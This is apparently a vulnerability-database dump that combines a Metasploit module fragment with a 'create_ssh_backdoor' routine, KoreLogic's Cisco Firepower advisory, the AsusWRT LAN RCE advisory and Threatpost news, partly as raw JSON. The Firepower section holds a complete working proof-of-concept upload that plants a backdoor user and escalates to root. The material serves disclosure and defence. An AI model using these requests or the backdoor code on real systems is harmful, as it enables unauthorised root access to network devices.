rulesimport.cgi') \n \nuri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi') \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri, \n'cookie' => \"CGISESSID=#{sid}\" \n}) \n \nunless res \nfail_with(Failure::Unknown, 'Failed to obtain rules import requirements.') \nend \n \nsf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1] \n \nunless sf_action_id \nfail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi') \nend \n \nsf_action_id \nend \n \ndef create_ssh_backdoor(sid, user, pass) \nuri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi') \nsf_action_id = get_sf_action_id(sid) \nsh_name = 'exploit.sh' \n \nprint_status(\"Attempting to create an SSH backdoor as #{user}:#{pass}\") \n \nmime_data = Rex::MIME::Message.new \nmime_data.add_part('Import', nil, nil, 'form-data; name=\"action_submit\"') \nmime_data.add_part('file', nil, 
## Cisco Firepower Threat Management Command Execution (CVE-2016-6433)

Source: https://packetstormsecurity.com/files/138988/Cisco-Firepower-Threat-Management-Command-Execution.html

KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command Execution Leading to Root Access

Title: Cisco Firepower Threat Management Console Remote Command Execution Leading to Root Access
Advisory ID: KL-001-2016-007
Publication Date: 2016.10.05
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-007.txt

1. Vulnerability Details

Affected Vendor: Cisco
Affected Product: Firepower Threat Management Console
Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
Platform: Embedded Linux
CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous Type, CWE-94: Improper Control of Generation of Code
Impact: Arbitrary Code Execution
Attack vector: HTTP
CVE-ID: CVE-2016-6433

2. Vulnerability Description

An authenticated user can run arbitrary system commands as the www user, which leads to root.

3. Technical Description

A valid session and CSRF token are required. The webserver runs as a non-root user which is permitted to sudo commands as root with no password.

```http
POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1
Host: 1.3.3.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------15519792567789791301241925798
Content-Length: 813

-----------------------------15519792567789791301241925798
Content-Disposition: form-data; name="manual_update"

1
-----------------------------15519792567789791301241925798
Content-Disposition: form-data; name="source"

file
-----------------------------15519792567789791301241925798
Content-Disposition: form-data; name="file"; filename="Sourcefire_Rule_Update-2016-03-04-001-vrt.sh"
Content-Type: application/octet-stream

sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic
-----------------------------15519792567789791301241925798
Content-Disposition: form-data; name="action_submit"

Import
-----------------------------15519792567789791301241925798
Content-Disposition: form-data; name="sf_action_id"

8c6059ae8dbedc089877b16b7be2ae7f
-----------------------------15519792567789791301241925798--


HTTP/1.1 200 OK
Date: Sat, 23 Apr 2016 13:38:01 GMT
Server: Apache
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Content-Length: 49998
Connection: close
Content-Type: text/html; charset=utf-8

...
```

```
$ ssh korelogic@1.3.3.7
Password:

Copyright 2004-2016, Cisco and/or its affiliates. All rights reserved.
Cisco is a registered trademark of Cisco Systems, Inc.
All other trademarks are property of their respective owners.

Cisco Fire Linux OS v6.0.1 (build 37)
Cisco Firepower Management Center for VMWare v6.0.1 (build 1213)

Could not chdir to home directory /Volume/home/korelogic: No such file or directory
korelogic@firepower:/$ sudo su -
Password:
root@firepower:~#
```

4. Mitigation and Remediation Recommendation

The vendor has acknowledged this vulnerability but has not issued a fix. Vendor acknowledgement available at:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc2

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.
2016.06.30 - Cisco acknowledges receipt of vulnerability report.
2016.07.20 - KoreLogic and Cisco discuss remediation timeline for this vulnerability and for 3 others reported in the same product.
2016.08.12 - 30 business days have elapsed since the vulnerability was reported to Cisco.
2016.09.02 - 45 business days have elapsed since the vulnerability was reported to Cisco.
2016.09.09 - KoreLogic asks for an update on the status of the remediation efforts.
2016.09.15 - Cisco confirms remediation is underway and soon to be completed.
2016.09.28 - Cisco informs KoreLogic that the acknowledgement details will be released publicly on 2016.10.05.
2016.10.05 - Public disclosure.

7. Proof of Concept

See Technical Description

The contents of this advisory are copyright (c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
## AsusWRT Router 3.0.0.4.380.7743 - LAN Remote Code Execution (CVE-2018-5999, CVE-2018-6000)

>> Unauthenticated LAN remote code execution in AsusWRT
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
Disclosure: 22/01/2018 / Last updated: 25/01/2018

>> Background and summary
AsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers.
Thankfully ASUS is a responsible company, and not only do they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers.

However, due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user.

A special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory).

>> Technical details:
#1
Vulnerability: HTTP server authentication bypass
CVE-2018-5999
Attack Vector: Remote
Constraints: None; exploitable by an unauthenticated attacker
Affected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007

The AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions.
In AsusWRT_source/router/httpd/httpd.c:

```c
handle_request(void)
{
...
	handler->auth(auth_userid, auth_passwd, auth_realm);
	auth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp);

	if (auth_result != 0)   // <--- auth fails
	{
		if(strcasecmp(method, "post") == 0){
			if (handler->input) {
				handler->input(file, conn_fp, cl, boundary);   // <--- but POST request is still processed
			}
			send_login_page(fromapp, auth_result, NULL, NULL, 0);
		}
		//if(!fromapp) http_logout(login_ip_tmp, cookies);
		return;
	}
...
}
```

This can (and will) be combined with other vulnerabilities to achieve remote code execution.

#2
Vulnerability: Unauthorised configuration change (NVRAM value setting)
CVE-2018-6000
Attack Vector: Remote
Constraints: None; exploitable by an unauthenticated attacker
Affected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007

By abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request.
In AsusWRT_source/router/httpd/web.c:

```c
do_vpnupload_post(char *url, FILE *stream, int len, char *boundary)
{
...
	if (!strncasecmp(post_buf, "Content-Disposition:", 20)) {
		if(strstr(post_buf, "name=\"file\""))
			break;
		else if(strstr(post_buf, "name=\"")) {
			offset = strlen(post_buf);
			fgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);
			len -= strlen(post_buf) - offset;
			offset = strlen(post_buf);
			fgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);
			len -= strlen(post_buf) - offset;
			p = post_buf;
			name = strstr(p, "\"") + 1;
			p = strstr(name, "\"");
			strcpy(p++, "\0");
			value = strstr(p, "\r\n\r\n") + 4;
			p = strstr(value, "\r");
			strcpy(p, "\0");
			//printf("%s=%s\n", name, value);
			nvram_set(name, value);
		}
	}
...
}
```

These NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker.

Once that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH.

A more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999.
The daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus on their website).

However, we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly, without changing any passwords.

(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015).

Packet structure (from AsusWRT_source/router/shared/iboxcom.h):

```c
/* Header */
typedef struct iboxPKTEx
{
	BYTE	ServiceID;
	BYTE	PacketType;
	WORD	OpCode;
	DWORD	Info;          // Or Transaction ID
	BYTE	MacAddress[6];
	BYTE	Password[32];  // NULL terminated string, string length:1~31, cannot be NULL string
} ibox_comm_pkt_hdr_ex;

/* Body */
typedef struct iboxPKTCmd
{
	WORD	len;
	BYTE	cmd[420];      // <--- command goes here
} PKT_SYSCMD;              // total 422 bytes
```

A Metasploit module exploiting this vulnerability has been released [3].

>> Fix:
Upgrade to AsusWRT v3.0.0.4.384.10007 or above.
See [4] for the very few details and new firmware released by Asus.

>> References:
[1] https://blogs.securiteam.com/index.php/archives/3589
[2] https://github.com/jduck/asus-cmd
[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb
[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/

Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
## Threatpost coverage: ASUS patches the AsusWRT LAN flaws (CVE-2018-5999, CVE-2018-6000)

ASUS released patches for over a dozen router models on Tuesday that are each vulnerable to multiple firmware flaws that, when combined, give a local unauthenticated attacker the ability to execute commands as root on targeted devices.

Router models patched by ASUS are RT-AC88U, RT-AC3100, RT-AC86U, RT-AC68U and RT-AC66U. The flaw is related to ASUS firmware AsusWRT (versions before 3.0.0.4.384_10007), used in select models of the company's router lines.

"The attack is done from the LAN side of the network, as opposed to the WAN side. In other words, as far as we know you cannot exploit this from the internet," according to network security firm Beyond Security, which disclosed the vulnerabilities [earlier this week](<https://blogs.securiteam.com/index.php/archives/3589>). "This (attack) works for someone in your LAN – even if they are on a guest network – and it may lead to remote command execution."

The two vulnerabilities are CVE-2018-6000 and CVE-2018-5999, a configuration manipulation flaw and a server authentication bypass flaw.

"Due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user," [wrote researcher Pedro Ribeiro](<https://github.com/pedrib/PoC/blob/master/advisories/asuswrt-lan-rce.txt>), who discovered the flaw.

The first flaw (CVE-2018-5999) is tied to the ASUS router firmware and takes advantage of a weakness in the AsusWRT HTTP server and the way it handles requests via "handle_request()", which allows an unauthenticated user to perform a POST request for certain actions, according to Ribeiro.

"This can (and will) be combined with other vulnerabilities to achieve remote code execution," he said.

Ribeiro describes the second bug (CVE-2018-6000) as an unauthorized configuration change flaw tied to the router's nonvolatile random access memory module (NVRAM).

"By abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability (CVE-2018-5999) that allows an attacker to set NVRAM configuration values directly from the request," he said.

According to Ribeiro's technical write-up, the NVRAM values include the admin password. Therefore an attacker can manipulate, change or set NVRAM values such as the admin password to whatever they want.

"Once that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH," he said. SSH is shorthand for Secure Socket Shell, a network protocol that provides administrators (or attackers) a secure way to access a remote computer for remote management or manipulation.

The attack scenario can be varied, such as abusing ASUS' own service called "infosvr" that listens on UDP broadcast port 9999 on the LAN or WLAN interface, writes Ribeiro. The infosvr service has also been a target of previous attack methods ([CVE-2014-9583](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9583>)).

The vulnerabilities were disclosed earlier this week by network security firm Beyond Security and were part of the company's SecuriTeam Secure Disclosure program.

According to Beyond Security, ASUS was notified of the vulnerabilities on Nov. 22.
Vulnerabilities are being patched by ASUS via automatic updates sent to affected routers, according to Beyond Security.\n\nA complete list of affected routers, according to ASUS, include:\n\nRT-AC88U 3.0.0.4.384_10007\n\nRT-AC3100 3.0.0.4.384_10007\n\nRT-AC86U 3.0.0.4.384_10007\n\nRT-AC68U series 3.0.0.4.384_10007 , also include RT-AC68U/ 68R/ 68W/ AC1900/ 68U_White/ 68P/ 1900P/ 1900U\n\nRT-AC66U_B1 series 3.0.0.4.384_10007, also include AC1750_B1\n", "cvss3": {}, "published": "2018-01-25T18:40:03", "type": "threatpost", "title": "ASUS Patches Root Command Execution Flaws Haunting Over a Dozen Router Models", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-25T18:40:03", "id": "THREATPOST:318D2AC145FDD81AA284239AD4ADB10D", "href": "https://threatpost.com/asus-patches-root-command-execution-flaws-haunting-over-a-dozen-router-models/129666/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:56", "description": "Cisco Systems warned customers on Friday of a critical vulnerability that could allow an attacker to execute arbitrary code and obtain full control on more than 300 different models of its switches and routers. Cisco said it became aware of the vulnerability after WikiLeaks released its Vault 7 cache of documents that revealed the existence of covert tools allegedly used by the U.S. Central Intelligence Agency.\n\nCisco said there is currently no patch or workaround for the vulnerability that affects software that runs its Cisco Cluster Management Protocol (CMP) processing code that runs in the company\u2019s Cisco IOS and Cisco IOS XE software.\n\n\u201cThis vulnerability was found during the analysis of documents related to the Vault 7 disclosure,\u201d wrote Cisco [in its security bulletin](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>). 
It said it was unaware of any \u201cpublic announcements or malicious use of the vulnerability.\u201d\n\nEarlier this month, WikiLeaks released more than 8,000 documents referred to as the Vault 7 leak that describe secret methods allegedly used by the CIA\u2019s Center for Cyber Intelligence to penetrate everything from cellphones and televisions, to enterprise hardware. According to WikiLeaks the release of the documents is the first of several. The documents described many alleged vulnerabilities, but WikiLeaks did not released any of the tools or exploits associated with the disclosures.\n\nThe Cisco flaw ([CVE-2017-3881](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3881>)) affects more than 300 Cisco products including its Cisco Catalyst Blade Switch hardware used in Dell, IBM and HP Enterprise equipment.\n\nAccording to Cisco, the vulnerability is tied to two factors related to how the CMP utilizes Telnet internally as a signaling and command protocol between cluster members. Cisco said the first relates to a vulnerability in the Cisco CMP processing code in Cisco IOS and Cisco IOS XE Software that could allow an unauthenticated, remote attacker to \u201ccause a reload of an affected device or remotely execute code with elevated privileges.\u201d\n\nThe second, according to Cisco, is tied to the incorrect processing of malformed CMP-specific Telnet options.\n\n\u201cIn terms of mitigations to consider, disabling the Telnet protocol as an allowed protocol for incoming connections would eliminate the exploit vector. Disabling Telnet and using SSH is recommended by Cisco,\u201d [wrote Omar Santos](<http://blogs.cisco.com/security/the-wikileaks-vault-7-leak-what-we-know-so-far>), principal engineer, with Cisco Product Security Incident Response Team, in a blog post. 
\u201cCustomers unable or unwilling to disable the Telnet protocol can reduce the attack surface by implementing infrastructure access control lists.\u201d\n\nCisco notes that the flaw impacts the default configuration of affected switches. It said hardware running Cisco IOS XE is vulnerable when \u201cthe CMP subsystem is present on the Cisco IOS XE software image running on the device, and the device is configured to accept incoming Telnet connections.\u201d\n\nSantos said the scope of Cisco\u2019s mitigation efforts was limited due to the fact none of the Vault 7 tools and malware referenced by WikiLeaks have been disclosed. \u201cAn ongoing investigation and focused analysis of the areas of code that are alluded to in the disclosure is underway. Until more information is available, there is little Cisco can do at this time from a vulnerability handling perspective,\u201d he wrote.\n\nFor his part, WikiLeaks\u2019 Julian Assange has offered to provide vendors with details on the vulnerabilities at a later date.\n\n\u201cTelnet was first developed in 1969, long before the birth of the internet, so it\u2019s easy to see why it would still have many unknown vulnerabilities,\u201d said Phil Neray, vice president of industrial cybersecurity at CyberX. 
\u201cSince cyberattackers can easily scan the internet for exposed Cisco servers using open source tools, we could see (adversaries) exploiting this newly discovered vulnerability either to create massive DDoS botnets or to snoop on traffic after gaining full control of the router.\u201d\n\nNeray said that this most recent vulnerability should serve as a wakeup call for the industry to phase out Telnet entirely and find more modern ways of remotely managing their devices.\n\nAccording to Cisco\u2019s analysis of the vulnerability, based on WikiLeak documents, malware that targets its hardware exhibits a range of capabilities that include: \u201cdata collection, data exfiltration, command execution with administrative privileges (and without any logging of such commands ever been executed), HTML traffic redirection, manipulation and modification (insertion of HTML code on web pages), DNS poisoning, covert tunneling and others.\u201d\n\nThat analysis also concluded malware authors have gone to great lengths to remain hidden post infection from forensic analysis. 
\u201cIt would also seem the malware author spends a significant amount of resources on quality assurance testing \u2013 in order, it seems, to make sure that once installed the malware will not cause the device to crash or misbehave,\u201d Santos wrote.\n", "cvss3": {}, "published": "2017-03-20T13:20:41", "type": "threatpost", "title": "Cisco Warns of Critical Vulnerability Revealed in WikiLeaks 'Vault 7' Data Dump", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2017-03-20T17:21:05", "id": "THREATPOST:E9751CD9F9151AD294951F327FB466C8", "href": "https://threatpost.com/cisco-warns-of-critical-vulnerability-revealed-in-vault-7-data-dump/124414/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:42", "description": "Cisco released an update this week that addresses a vulnerability in software running in more than 300 of its switches. The flaw was disclosed among the WikiLeaks Vault 7 dump of alleged CIA offensive hacking tools, and proof-of-concept exploit code exists that targets the vulnerability.\n\nCisco said the vulnerability was in the Cluster Management Protocol (CMP) processing code running in its IOS and IOS XE software, the company\u2019s longstanding networking operating system. In an advisory, Cisco cautioned that attackers could remotely execute code with elevated privileges, or cause a vulnerable switch or networking device to reload.\n\nCisco acknowledged the vulnerability, CVE-2017-3881, shortly after [investigating the WikiLeaks dump](<https://threatpost.com/cisco-warns-of-critical-vulnerability-revealed-in-vault-7-data-dump/124414/>). Attackers could abuse the code\u2019s use of telnet in the software to access a switch and gain full control. Cisco said CMP uses telnet as a signaling and command protocol between devices in a cluster. 
It conceded that it failed to properly restrict the use of CMP-specific telnet to only internal communication, and that the code incorrectly processed malformed CMP telnet options.\n\n\u201cAn attacker could exploit this vulnerability by sending malformed CMP-specific telnet options while establishing a telnet session with an affected Cisco device configured to accept telnet connections,\u201d Cisco said in its [advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>). \u201cAn exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device.\u201d\n\nCisco published a long list of switches from its Catalyst product line, as well as Cisco Embedded Service, IE 2000-5000, ME, RF and SM-X models. The switches are vulnerable, Cisco said, only if its CMP subsystem is present and running on IOS XE and the device is configured to accept telnet connections. This, Cisco said, is the default configuration.\n\nThe Vault 7 leaks began in March when WikiLeaks released more than 8,000 documents that describe secret methods allegedly used by the CIA\u2019s Center for Cyber Intelligence to penetrate everything from cellphones and televisions, to enterprise hardware. The documents described many alleged vulnerabilities, but WikiLeaks did not released any of the tools or exploits associated with the disclosures.\n\nThat was the first of several Vault 7 leaks, and was followed up two weeks later with a cache of documents and information indicating the CIA had the capability to [track iPhone users](<https://threatpost.com/wikileaks-dump-shows-cia-interdiction-of-iphone-supply-chain/124540/>) and had at its disposal malware implants for Apple firmware running on Macbooks.\n\nThe so-called Dark Matter release also included documentation for a tracking beacon that could be implanted on factory-fresh iPhones. 
The agency also concentrated on developing malware and exploits that would attack firmware running on Macs and iPhones, specifically EFI and UEFI firmware, giving it persistence on a target\u2019s device.\n", "cvss3": {}, "published": "2017-05-10T10:10:35", "type": "threatpost", "title": "Cisco Patches IOS XE Vulnerability Leaked in Vault 7 Dump", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2017-05-10T14:10:35", "id": "THREATPOST:D91525C573A8C64689DAD91F6F0E4484", "href": "https://threatpost.com/cisco-patches-ios-xe-vulnerability-leaked-in-vault-7-dump/125568/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-27T11:47:22", "description": "Cisco has rushed out patches for a critical vulnerability in its ASR 9000 routers that could give remote, unauthenticated attackers access to the devices \u2013 as well as the power to launch denial-of-service (DoS) attacks against them.\n\nThe flaw is specifically in Cisco Aggregation Services Routers (ASR) 9000 Series, Cisco\u2019s popular carrier Ethernet [router](<https://www.cisco.com/c/en/us/products/routers/asr-9000-series-aggregation-services-routers/index.html>) intended for service applications. The vulnerability could allow an unauthenticated, remote attacker to access internal applications on the sysadmin virtual machine for the router, according to a Wednesday advisory.\n\n\u201cAn attacker could exploit this vulnerability by connecting to one of the listening internal applications,\u201d the [advisory stated](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190417-asr9k-exr>). 
\u201cA successful exploit could result in unstable conditions, including both a denial of service and remote unauthenticated access to the device.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability ([CVE-2019-1710](<https://nvd.nist.gov/vuln/detail/CVE-2019-1710>)) has a CVSS score of 9.8, making it critical in severity.\n\nSpecifically, Cisco ASR 9000 routers have an issue where the internal sysadmin applications are incorrectly isolated in the secondary management interface. ASR 9000 routers that are running Cisco IOS XR 64-bit software and that have the secondary management interface are impacted.\n\nThat means an attacker could exploit this vulnerability by connecting to one of the listening internal applications. A successful exploit could result in unstable conditions, including both DoS and remote unauthenticated access to the device.\n\nCisco said that the vulnerability was discovered during internal security testing, and that it is not aware of any exploits.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/18083038/ASR-router-.png>)\n\nCisco ASR 9000 Routers\n\nCisco has urged users to upgrade to the Cisco IOS XR 64-bit software as soon as possible: \u201cThis vulnerability has been fixed in Cisco IOS XR 64-bit Software Release 6.5.3 and 7.0.1, which will edit the calvados_boostrap.cfg file and reload the device,\u201d it said.\n\nCisco on Wednesday also revealed that exploit code for a previously-disclosed critical remote code execution vulnerability was now available. 
The critical flaw (CVE-2017-3881) was previously disclosed in March 2017 and exists in the Cisco Cluster Management Protocol used in Cisco IOS and IOS XE software.\n\n\u201cA vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges,\u201d according to Cisco.\n\nCisco has released patches for the flaw \u2013 but the exploit code was made available by a security researcher on April 10, according to [Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>).\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is aware of exploitation of the vulnerability that is described in this advisory,\u201d according to Cisco.\n\n[Earlier in April](<https://threatpost.com/cisco-finally-patches-routers-bugs-as-new-unpatched-flaws-surface/143528/>), Cisco re-patched flaws for two high-severity bugs affecting its RV320 and RV325 routers after a botched first attempt at fixing them. The company also reported two new medium-severity router bugs impacting the same router models \u2013 and with no reported fixes or workarounds.\n\n**_Don\u2019t miss our free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/8845482382938181378?source=ART>)**_, \u201cData Security in the Cloud,\u201d on April 24 at 2 p.m. ET._**\n\n**_A panel of experts will join Threatpost senior editor Tara Seals to discuss _****_how to lock down data when the traditional network perimeter is no longer in place. 
They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS._**\n", "cvss3": {}, "published": "2019-04-18T13:04:33", "type": "threatpost", "title": "Cisco Patches Critical Flaw In ASR 9000 Routers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-3881", "CVE-2019-1710", "CVE-2020-10245"], "modified": "2019-04-18T13:04:33", "id": "THREATPOST:280E7DBF7FC18A42CA8004ED97B61008", "href": "https://threatpost.com/cisco-patch-asr-9000-routers/143895/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-09-25T18:25:18", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-22T00:00:00", "type": "exploitdb", "title": "AsusWRT Router < 3.0.0.4.380.7743 - LAN Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2018-5999", "2018-6000", "CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-22T00:00:00", "id": 
"EDB-ID:43881", "href": "https://www.exploit-db.com/exploits/43881", "sourceData": ">> Unauthenticated LAN remote code execution in AsusWRT\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n=================================================================================\r\nDisclosure: 22/01/2018 / Last updated: 25/01/2018\r\n\r\n\r\n>> Background and summary\r\nAsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers.\r\nThankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers.\r\n\r\nHowever due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user.\r\n\r\nA special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory).\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: HTTP server authentication bypass\r\nCVE-2018-5999\r\nAttack Vector: Remote\r\nConstraints: None; exploitable by an unauthenticated attacker\r\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\r\n\r\nThe AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions.\r\nIn AsusWRT_source/router/httpd/httpd.c:\r\n\r\nhandle_request(void)\r\n{\r\n...\r\n\thandler->auth(auth_userid, auth_passwd, auth_realm);\r\n\tauth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp);\r\n\r\n\tif 
(auth_result != 0) <--- auth fails\r\n\t{\r\n\t\tif(strcasecmp(method, \"post\") == 0){\r\n\t\t\tif (handler->input) {\r\n\t\t\t\thandler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed\r\n\t\t\t}\r\n\t\t\tsend_login_page(fromapp, auth_result, NULL, NULL, 0);\r\n\t\t}\r\n\t\t//if(!fromapp) http_logout(login_ip_tmp, cookies);\r\n\t\treturn;\r\n\t}\r\n...\r\n}\r\n\r\nThis can (and will) be combined with other vulnerabilities to achieve remote code execution.\r\n\r\n\r\n#2\r\nVulnerability: Unauthorised configuration change (NVRAM value setting)\r\nCVE-2018-6000\r\nAttack Vector: Remote\r\nConstraints: None; exploitable by an unauthenticated attacker\r\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\r\n\r\nBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request.\r\nIn AsusWRT_source/router/httpd/web.c:\r\n\r\ndo_vpnupload_post(char *url, FILE *stream, int len, char *boundary)\r\n{\r\n...\r\n\tif (!strncasecmp(post_buf, \"Content-Disposition:\", 20)) {\r\n\t\tif(strstr(post_buf, \"name=\\\"file\\\"\"))\r\n\t\t\tbreak;\r\n\t\telse if(strstr(post_buf, \"name=\\\"\")) {\r\n\t\t\toffset = strlen(post_buf);\r\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\r\n\t\t\tlen -= strlen(post_buf) - offset;\r\n\t\t\toffset = strlen(post_buf);\r\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\r\n\t\t\tlen -= 